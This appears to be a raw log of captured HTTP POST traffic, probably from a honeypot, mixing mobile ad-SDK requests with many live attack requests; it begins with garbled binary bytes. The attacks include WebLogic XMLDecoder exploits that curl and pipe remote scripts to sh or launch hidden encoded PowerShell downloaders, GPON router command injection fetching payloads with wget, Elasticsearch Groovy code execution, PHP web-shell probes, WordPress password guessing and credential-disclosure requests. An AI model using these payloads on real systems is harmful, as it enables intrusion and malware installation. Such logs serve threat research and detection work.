Ä„0LzBo(EhA*<kZ&≈KlAvpf◊8K*:kZ&=0OoBcsBd8}0kX&f0OoánjA}C& R&?0OoBcpjBh@?8g2¶50MoBcpjBhC*;~Z*¬êHo@cpjBhC*8kY3=<YJcrjBhC*8kZ&>%Oc[ûxj@h@*8kfi°90LzBoàıEhA*9kZ&R}NoAvpfY E*:k[&=0Í^KcsBd˘˜:kX&=0OoBcpjA}C&A¸_&?0OoBcpjBh@?8gÒ‡<0Mo7cpj[«6(;~Z*Jo@cpjBhC*8kY3=<ƒJcrjChC*ßkZ&>%Ocºúèï@hçˆâRx&=0OzB
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=44444444
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 318
{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","networkOperator":"TELKOMSEL","volume":0.4,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://behacdn.ksmobile.net/adsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 222
fi‡qôÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpjIN>j√4§…!3 §∏Ê(`˚é;S†è‰ ≤@≈OøJE‰ÙØI∫üKqéUÀ·ö"÷(∆|ÊVj}>™6ˇ‚VeU∑oØ˙1TvÚ©Rttı4Ωrœ3…Æ#óâØ≤A”ÃöÉW‰qbê;ªùºfia¿¿\
◊…ò n–œj∞I”Rú‰`<XFŸÙπ≥Ó(SLÁ›ô ∆ê]qF∂Í≠Ì(൫2J©æàu¿õ
POST http://md5decryption.com/index.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Host: md5decryption.com
Referer: http://md5decryption.com/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Proxy-Connection: Keep-Alive
Content-Length: 56
hash=ba5e55274f87dc3ca333de8ebb8f0c4c&submit=Decrypt It!
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST http://d.applovin.com/device?device_token=MaznYs97JTiqaqEwnZGZ5hoNAbGKHRajj5FMcZF_ODHYTEi_kuVCQ4yNWoT9kVKCYOdmiOu8EBuDlBzDf9dDAcksZAxPMlyVV-CvlM0u7mEUGLyh8g8trSy-C2iSYtXpQsCRhRgeTqA7eY2q-c8xqFHgtRJiJ0jgDFMg8-H0uSU= HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 970
{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":179,"SubmitData_time":467814,"FetchNextAd_time":2814183,"RepeatSubmitData_time":359402,"RenderAd_time":1347613,"TaskDispatchPostback_time":367125,"ad_session_start":1496194010033,"FetchNextAd_count":177,"RepeatFetchNextAd_time":585708,"cached_files_expired":66,"RepeatFetchNextAd_count":23,"RepeatSubmitData_count":19,"TaskDispatchPostback_count":38,"TaskCollectAdvertisingId_time":20602,"RenderAd_count":64,"SubmitData_count":34,"TaskCollectAdvertisingId_count":38}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149463223761&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1
Referer: http://x.x.x.x:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x:8080
Content-Length: 0
Cache-Control: no-cache
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
EPdbkNjNY5qYx78inpLijz+we9kA9LEhIYcoL2MjvsAHtN4MIF0uMpuIw0OHvInPOcpSxj1fdFcNViYkdTyHrTI96CqXaE6M+Nm48RJbWTLU2dv/+cfs2YLh63706esDHS8gaYM5/j2RX+V+yuiOMkx4031GPdP7zd6Cu4NW49DkwPrzl2vtYglp4aOFk5o6KmeG78myspweEienXpG2Oe2vhhCAo0S/8nz3QpnFe8CpQDrux+w2nanpzqbxXNcPvZm9pl9BsOkh+ma0AYcUk0wkJsXI+hm4beHc+Sxw+5SjR1K7skH6WdOst4g+yl03ij+UznQUL6isMTcWLk4l0YAYHu7Y54LkSIB9WUJC/EWVDr4Hg3NhTgMiO0zko5riQHe6h8/BDXwnF9wk223DblWOBrg=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60
A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1495891946309
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 1297
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
S6wMk9vKMLQI5f/H+NH7pbyryS5Oe9TJlmyFRrHEPzqa1R3Ko3IgwqBAlgCqDXOm9056gOGJiTgORlF4tOa1cGCcs06OE4sha2RvqLlDkolA2bLw1WAtr2wl7X3wRXidlakJGZ7pJmm9cJfKzB71jOJ61a3G3Eq38ttXGaXfbPH9+Xkh0jShws0VEXzPAH5b40QVzADD5DCa181lRp063Si/X+/9Q0jtpsCBwBBgx1DWXWKqC3PC3u7yoshRnuv8zgrr+qPIrOQx3GJ7od/zzO6gP5/3LpHvqmRkjH31ypIWle3QgJ7J0GHuFuYJKZ9l/Tn1YG1ukV4n5ZneAUgd3zX3uCuGj515/eUv9/ZUKYiNQ7IDk6cd4JAUNvfTBANHTgo0tYz65PKijV39+sr9tYCpzg==
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache
E/RawduZZN+AysWOhFb5YxA5aTXovRwSIgctwNIqe5Q0F7PiMgwlMd7d9qYV3HRGCkz65z+57jeXOMZhDX3YkqBkA1wPkh/1GZEEjKEwfgvtGVa/jKSak70Bvxmj/qdXpIEuTv/hA9VdrGr0POSFbRBRiCbNRK/O35MQ4k60t4Otf/Xvkv6GqFJ4NoocMs2ejI/tzxtTcu6xBFuz2RR/JLyEeOkgjr1qFNcn5U8HNj1VFcv/san0P4TYq7sDnugCig5yQMdvhEGKGLdFlG2exQw3vwRiXQ2oDegcozDv1t/uVPKOwe0POyhIXyH2OoM+0ezYGsQNkwjrBjDiLqQiVTbs9Z7r3HhXLWH/at6YndYY5kX8Trvx
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST /sdk HTTP/1.1
Connection: close
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Length: 441
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
993504
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
a09d865b923b4656a82b7e83f3d782ab
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4--
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=258852
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: text/plain
Content-length: 119
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0
POST http://cmdts.ksmobile.com/c/ HTTP/1.1
Content-Length: 120
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: cmdts.ksmobile.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
POST /wc.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
1=die('Hello, Peppa!'.(string)(111111111*9));
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1057
Content-Type: multipart/form-data; boundary=IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
539893
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
13b7aeee7b8deaf63deb15a58cbb166c
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL--
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E 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</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
eval=die((string)(111111111*9));
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
POST http://f2.doodlemobile.com/feature_server/geo-ip/test.php HTTP/1.1
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Host: f2.doodlemobile.com
Connection: Keep-Alive
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache
FvBbxdvANuTXV1DuCgtRhVsKTUrnWRa7PbyOoi0VI8t3vqMJvrtftXf8D9lY2DqZA4bZymBOyq8bIjumHzWPyag+OSowPxYkiFOe2J2M/nqDqrQOW1rSgLNUkTd573Z9lTouk2T4lxNQiCprpFzoZl0t0BWpKpR5ooYvaovGK2v46USRSZecet7sbP+0zki0S4kgX2fsWQE8VzvSqOmbN7gR692snuPhb091lRvOJaO7EvzIcUsXMMd3iXsy1/t4mB4TicOpXgyGu8w8Rn+NRGrrYZG5eBfVxrE4wX+RxX73nmd7BCwGa0udT69nIvSt8rOYMtTNZ7HQ8s53Lfgnzm722MNEOOxexBW/y5hFVLzpBb85e5gvLSK5PvKqMagXUnFciDVEp5eKBkeV
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache
QqAPkN/OYif8JQgkXSL8wdj3lu9MhFEWlvSKmSlihRG7Q4QZAT9l/aGpn1c/aiGYB7WDwD05SznR08xuvMoDIb/t2jKMMadBtxeP+PhtuMFFN+wW5g4b+TUCSoYlgt52hBod0JvcQjwZAQFaObNxZlRDbuiQAeqQfxnRbb4zxz4y3G07Th7j5LUeWIs9eihOiRF9LDQFxov400c6QWrd1qEZ/h+Pq3DhkzNVNULZ3MAM4aPkLU67nJBe7C/6K7R8TTuJSnJoW2JzUCHHLQyCK4Qhc9k/dJz/CIZUNYoizOqSP0mHP5I1ALbyUt/QqQHuTbrKfC2Bcm/uOugutUyqDVNpSMeIc9PUnol+6xhWJhMYvNDnSevXtX+TuUPaIGwsC2BsI1OHrY7sXQ==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache
FvFYkNPJZgjx8tuuucIIEdXLVKV1KarAYU7c4m/Vmeg7RBxIC6LP3SMPYjLECOyeI1Ag+iVgJGirEqkRE+dCSiBpJGxHgZKue1AXG55LCZF6qLmEs1o4bIvH7JLvNns7YPBhBg3Bq1PkaLb1iTs0WKGEBlC/oy0S77JePy5lV49RlEWG3m8zLYE/Mqx4tj3Ae48tAbdE6VWLzStoQOZzdz4sxbBQjU2ZuW61n02UtIuq3y8xw6QWl0dGBICEWhFoeBgfgE4b/fJvdu4MDoNSw8BlAQqjJgW8tTH+SQQ98swm4BcYyV4OsBoQVYUKfw6W19/gE8KpLA6VHFQK58KccozFMn1v3tYADHLglEnlUoVOHQ8+UbdKSJl8cYZ3Ggla
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
